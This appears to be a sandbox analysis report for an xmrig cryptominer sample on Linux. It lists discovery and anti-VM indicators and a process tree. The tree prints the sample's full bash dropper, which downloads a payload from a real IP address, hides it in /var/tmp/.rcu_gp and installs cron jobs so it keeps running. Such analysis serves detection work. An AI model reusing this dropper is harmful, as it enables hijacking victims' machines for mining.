xmrig | f6371d8b3bcc784017d4fbb544550873281cdc4aa4167ffac91526126d3b4e01

execution persistence privilege_escalatio

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

Cron

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.TFtXan	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	.report_system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

description	ioc	Process
File opened for reading	/proc/cpuinfo	.report_system

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/acpi_cppc/nominal_freq	.report_system
File opened for reading	/sys/devices/system/cpu/possible	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/cpu_core/cpus	.report_system
File opened for reading	/sys/devices/system/node/node0/access1/initiators	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/cpumap	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	.report_system
File opened for reading	/sys/devices/system/node/online	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	.report_system
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	.report_system
File opened for reading	/sys/firmware/dmi/tables/DMI	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/kernel/mm/hugepages	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/access0/initiators	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/meminfo	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/hugepages	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/virtual/dmi/id	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/bus/soc/devices	.report_system
File opened for reading	/sys/devices/system/cpu	.report_system
File opened for reading	/sys/devices/cpu_atom/cpus	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/69/cgroup	pgrep
File opened for reading	/proc/2154/stat	pgrep
File opened for reading	/proc/1945/cgroup	pgrep
File opened for reading	/proc/13/cmdline	pgrep
File opened for reading	/proc/198/cmdline	pgrep
File opened for reading	/proc/32/ctty	pgrep
File opened for reading	/proc/71/ctty	pgrep
File opened for reading	/proc/198/ctty	pgrep
File opened for reading	/proc/2533/cmdline	pgrep
File opened for reading	/proc/1980/ctty	pgrep
File opened for reading	/proc/2266/cmdline	pgrep
File opened for reading	/proc/31/ctty	pgrep
File opened for reading	/proc/40/cgroup	pgrep
File opened for reading	/proc/193/ctty	pgrep
File opened for reading	/proc/417/stat	pgrep
File opened for reading	/proc/792/ctty	pgrep
File opened for reading	/proc/199/status	pgrep
File opened for reading	/proc/2430/status	pgrep
File opened for reading	/proc/201/cmdline	pgrep
File opened for reading	/proc/1945/status	pgrep
File opened for reading	/proc/1816/ctty	pgrep
File opened for reading	/proc/512/ctty	pgrep
File opened for reading	/proc/4/status	pgrep
File opened for reading	/proc/124/stat	pgrep
File opened for reading	/proc/2476/ctty	pgrep
File opened for reading	/proc/51/ctty	pgrep
File opened for reading	/proc/2288/ctty	pgrep
File opened for reading	/proc/2477/status	pgrep
File opened for reading	/proc/18/ctty	pgrep
File opened for reading	/proc/80/cgroup	pgrep
File opened for reading	/proc/1985/stat	pgrep
File opened for reading	/proc/1926/ctty	pgrep
File opened for reading	/proc/13/status	pgrep
File opened for reading	/proc/15/stat	pgrep
File opened for reading	/proc/432/status	pgrep
File opened for reading	/proc/1077/cgroup	pgrep
File opened for reading	/proc/1052/ctty	pgrep
File opened for reading	/proc/2154/ctty	pgrep
File opened for reading	/proc/2198/ctty	pgrep
File opened for reading	/proc/2430/cmdline	pgrep
File opened for reading	/proc/1120/stat	pgrep
File opened for reading	/proc/2150/stat	pgrep
File opened for reading	/proc/235/cgroup	pgrep
File opened for reading	/proc/18/ctty	pgrep
File opened for reading	/proc/8/status	pgrep
File opened for reading	/proc/17/cmdline	pgrep
File opened for reading	/proc/1965/cgroup	pgrep
File opened for reading	/proc/2312/cmdline	pgrep
File opened for reading	/proc/38/status	pgrep
File opened for reading	/proc/1398/stat	pgrep
File opened for reading	/proc/30/status	pgrep
File opened for reading	/proc/2305/ctty	pgrep
File opened for reading	/proc/36/stat	pgrep
File opened for reading	/proc/2254/cmdline	pgrep
File opened for reading	/proc/1907/cgroup	pgrep
File opened for reading	/proc/40/ctty	pgrep
File opened for reading	/proc/2006/ctty	pgrep
File opened for reading	/proc/1704/cgroup	pgrep
File opened for reading	/proc/511/cmdline	pgrep
File opened for reading	/proc/147/status	pgrep
File opened for reading	/proc/1794/cmdline	pgrep
File opened for reading	/proc/2254/status	pgrep
File opened for reading	/proc/18/stat	pgrep
File opened for reading	/proc/385/status	pgrep

/tmp/f6371d8b3bcc784017d4fbb544550873281cdc4aa4167ffac91526126d3b4e01.elf
/tmp/f6371d8b3bcc784017d4fbb544550873281cdc4aa4167ffac91526126d3b4e01.elf
1⤵
PID:2489

/bin/bash
/tmp/f6371d8b3bcc784017d4fbb544550873281cdc4aa4167ffac91526126d3b4e01.elf -c "exec '/tmp/f6371d8b3bcc784017d4fbb544550873281cdc4aa4167ffac91526126d3b4e01.elf' \"\$@\"" /tmp/f6371d8b3bcc784017d4fbb544550873281cdc4aa4167ffac91526126d3b4e01.elf
1⤵
PID:2489

/tmp/f6371d8b3bcc784017d4fbb544550873281cdc4aa4167ffac91526126d3b4e01.elf
/tmp/f6371d8b3bcc784017d4fbb544550873281cdc4aa4167ffac91526126d3b4e01.elf
1⤵
PID:2489

/bin/bash
/tmp/f6371d8b3bcc784017d4fbb544550873281cdc4aa4167ffac91526126d3b4e01.elf -c " #!/bin/bash RCU_GP_DIR=\"/var/tmp/.rcu_gp\" REPORT_SYSTEM_URL=\"http://66.63.187.200/.puscarie/.report_system\" DIICOT_FILE=\"diicot\" setup_report_system() { if [ ! -d \"\$RCU_GP_DIR\" ]; then mkdir \"\$RCU_GP_DIR\" fi cd \"\$RCU_GP_DIR\" || exit if command -v wget &> /dev/null; then wget \"\$REPORT_SYSTEM_URL\" -O .report_system elif command -v curl &> /dev/null; then curl -o .report_system \"\$REPORT_SYSTEM_URL\" else echo \"Nu s-a gasit nici wget, nici curl\" exit 1 fi chmod +x .report_system cd - || exit } create_diicot_file() { DIICOT_PATH=\"\$RCU_GP_DIR/\$DIICOT_FILE\" cat <<EOL > \"\$DIICOT_PATH\" #!/bin/bash if ! pgrep -x .report_system >/dev/null; then /var/tmp/.rcu_gp/./.report_system > /dev/null 2>&1 & disown \$* else : fi EOL chmod +x \"\$DIICOT_PATH\" } setup_cron_jobs() { locatie=\"\$RCU_GP_DIR\" locatie2=\"\$PWD\" if [ ! -f \"\$locatie/.ps4\" ]; then echo \"\$locatie\" > \"\$locatie/.ps4\" fi if ! crontab -l | grep -q '.main'; then rm -rf \"\$locatie/.ps5\" echo \"@daily \$locatie/\$DIICOT_FILE\" >> \"\$locatie/.ps5\" sleep 1 echo \"@reboot \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 echo \"@monthly \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 crontab \"\$locatie/.ps5\" sleep 1 rm -rf \"\$locatie/.ps5\" fi } setup_report_system create_diicot_file setup_cron_jobs while : do \$(cat /var/tmp/.rcu_gp/.ps4)/diicot setup_cron_jobs sleep 2.5 done echo \"Merge bn mineru serifule\" " /tmp/f6371d8b3bcc784017d4fbb544550873281cdc4aa4167ffac91526126d3b4e01.elf
1⤵
- File and Directory Permissions Modification
PID:2489
- /usr/bin/mkdir
  mkdir /var/tmp/.rcu_gp
  2⤵
  PID:2491
- /usr/bin/wget
  wget http://66.63.187.200/.puscarie/.report_system -O .report_system
  2⤵
  PID:2492
- /usr/bin/chmod
  chmod +x .report_system
  2⤵
  - File and Directory Permissions Modification
  PID:2514
- /usr/bin/cat
  cat
  2⤵
  PID:2515
- /usr/bin/chmod
  chmod +x /var/tmp/.rcu_gp/diicot
  2⤵
  - File and Directory Permissions Modification
  PID:2516
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2517
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2518
- /usr/bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:2519
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:2520
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:2521
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:2522
- /usr/bin/crontab
  crontab /var/tmp/.rcu_gp/.ps5
  2⤵
  - Creates/modifies Cron job
  PID:2523
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:2524
- /usr/bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:2525
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2526
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2527
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2528
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2530
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2531
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2532
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2540
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2541
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2542
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2543
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2544
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2545
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2546
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2547
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2548
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2549
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2550
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2551
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2552
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2553
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2554
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2555
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2556
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2557
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2558
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2559
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2560
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2562
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2561
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2563
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2564
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2565
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2566
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2567
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2568
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2569
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2570
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2571
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2572
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2573
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2574
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2575
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2576
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2577
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2578
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2579
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2580
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2581
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2585
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2586
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2587
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2588
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2589
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2590
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2591
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2592
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2593
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2594
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2595
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2596
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2597
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2598
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2599
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2600
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2601
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2602
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2603
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2604
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2605
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2606
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2607
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2608
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2609
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2610
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2611
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2612
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2613
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2614
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2615
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2616
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2617
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2619
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2618
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2620
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2621
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2622
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2623
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2624
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2625
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2626
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2627
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2628
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2629
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2630
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2631
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2632
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2633
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2634
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2635
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2636
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2637
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2638
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2639
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2640
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2641
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2643
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2642
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2644
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2645
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2646
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2647
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2648
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2649
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2650
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2651
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2652
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2653
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2654
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2655
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2656
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2657
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2658
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2659
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2660
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2661
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2662
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2663
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2664
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2665
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2666
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2667
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2668
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2669
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2670
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2671
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2672
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2673
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2674
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2675
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
